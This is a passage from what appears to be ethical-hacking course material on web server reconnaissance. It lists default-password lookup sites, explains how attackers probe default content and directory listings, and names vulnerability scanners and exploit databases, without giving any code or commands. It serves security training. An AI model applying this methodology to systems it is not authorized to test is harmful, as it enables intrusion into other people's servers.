cirt.net is the lookup database for default passwords, credentials, and ports.

Following are some of the additional websites for finding web server administrative interface default passwords:

■   h ttp://open-sez. me

■   https://www.fortypoundhead.com 

■   http://www.defaultpassword.us 

■   http://defaultpasswords.in

■ http://www.routerpasswords.com 

■ http://www.defaultpassword.com 

■ https://default-password.info


Finding Default Content of Web Server

Most of the web applications' servers contain default content and functionalities allowing attackers to leverage attacks. Following are some of the common default contents and functionalities that an attacker tries to identify in the web servers:

■   Administrators debug and test functionality

Functionalities that are designed for the administrators to debug, diagnose, and test the web applications and web servers contain useful configuration information and runtime state of both server and its running applications. Hence, these functionalities are the main targets that lure the attackers.

■   Sample functionality to demonstrate common tasks

Many servers contain various sample scripts and pages that are designed to demonstrate certain application server functions and APIs. Often, web server fails to secure these scripts from the attackers since these sample scripts either contain vulnerabilities that can be exploited by attackers or implement functionalities that allow attackers to exploit.

■    Publically accessible powerful functions

Some web servers include powerful functionalities that are intended for administrative personnel and restrict from public use. However, attacker tries to exploit such powerful functions to compromise the server and gain access. For example, some application servers allow the web archives to be deployed over the same HTTP port as that used by application itself. Attacker uses common exploitation frameworks such as Metasploit to perform scanning to identify the default passwords, upload backdoor, and gain command shell access to the target server.

■   Server installation manuals

An attacker tries to identify the server manuals that may contain useful information about configuration and server installation. Accessing this information allows the attacker to prepare appropriate framework to exploit the installed web server.

You   can   use   tools   such   as   Nikto2   and   exploit   databases   such   as   SecurityFocus (http://www.securityfocus.com) to identify the default content.

■    Nikto2

Source: https://cirt.net

Nikto   is   a   vulnerability   scanner   that   is   used   extensively   to   identify   potential vulnerabilities in web applications and web servers.

Finding Directory Listings of Web Server

When  a  web  server  receives  a  request  for  the  directory  rather  than  the  actual  file,  the  web server responds to the request in the following ways:

■ Return Default Resource within directory

It may return a default resource within the directory, such as index.html ■ Return Error

It may return an error, such as the HTTP status code 403, indicating that the request is not permitted

■ Return listing of directory content

It may return a listing showing the contents of the directory. A sample directory listing is illustrated in the above screenshot.

Though the directory listings do not have significant relevance from security point of view, these directory listings sometimes possess the following vulnerabilities that allows the attackers to compromise web application.

■    Improper access controls

■    Unintentional access to web root of servers

In general, after discovering the directory on the web server, the attackers make a request for the same directory and try to access the directory listings. Attackers also try to exploit vulnerable web server software that gives access to the directory listings.


Vulnerability Scanning

Vulnerability scanning determines vulnerabilities and misconfigurations of a target web server or a network. Vulnerability scanning finds possible weaknesses in a target server to exploit in a web server attack. An attacker uses various automated tools to perform vulnerability scanning on a target server. Attackers use sniffing techniques to obtain data about network traffic to find out active systems, network services, and applications in the vulnerability-scanning phase. You can use tools such as Acunetix Web Vulnerability Scanner to perform vulnerability scanning and find hosts, services, and vulnerabilities.

■   Acunetix Web Vulnerability Scanner Source: https://www.acunetix.com

Acunetix Web Vulnerability Scanner scans websites and detects vulnerabilities. Acunetix WVS checks web applications for SQL injections, XSS, and so on. It includes advanced pen testing tools to ease manual security audit processes and creates professional security audit and regulatory compliance reports based on AcuSensor Technology that detects more vulnerabilities and generates fewer false positives. It supports testing of web forms and password protected areas, pages with CAPTCHA, single sign-on, and two- factor authentication mechanisms. It detects application languages, web server types, and smartphone-optimized sites. Acunetix crawls and analyzes different types of websites including HTML5, SOAP, and AJAX. It supports scanning of network services running on the server and port scanning of the web server.

Following are some of the additional vulnerability scanning tools: ■    Fortify Weblnspect (https://software.microfocus.com) ■    Ness us (https://www.tenable.com)

■    Paros (https://sourceforge.net)

Finding Exploitable Vulnerabilities

The software designing flaws and programming errors lead to security vulnerabilities. An attacker takes advantage of these vulnerabilities to perform various attacks on confidentiality, availability, or integrity of a system. Attackers exploit these software vulnerabilities such as programming flaws in a program, service, or within the OS software or kernel to execute malicious code.

Many public vulnerability repositories are available online that allow access to information about various software vulnerabilities. Attackers search for a web server exploitable vulnerabilities based on the web server's OS and software application on exploit sites such as SecurityFocus (http://www.securityfocus.com) and Exploit Database (https ://www.exploit- db.com). Attackers use information gathered in the previous stages to find the relevant vulnerabilities by using More Options button.

Exploiting these vulnerabilities allows attacker to execute a command or binary on a target machine to gain higher privileges than the existing or bypass security mechanisms. Attackers using these exploits can even access privileged user accounts and credentials.j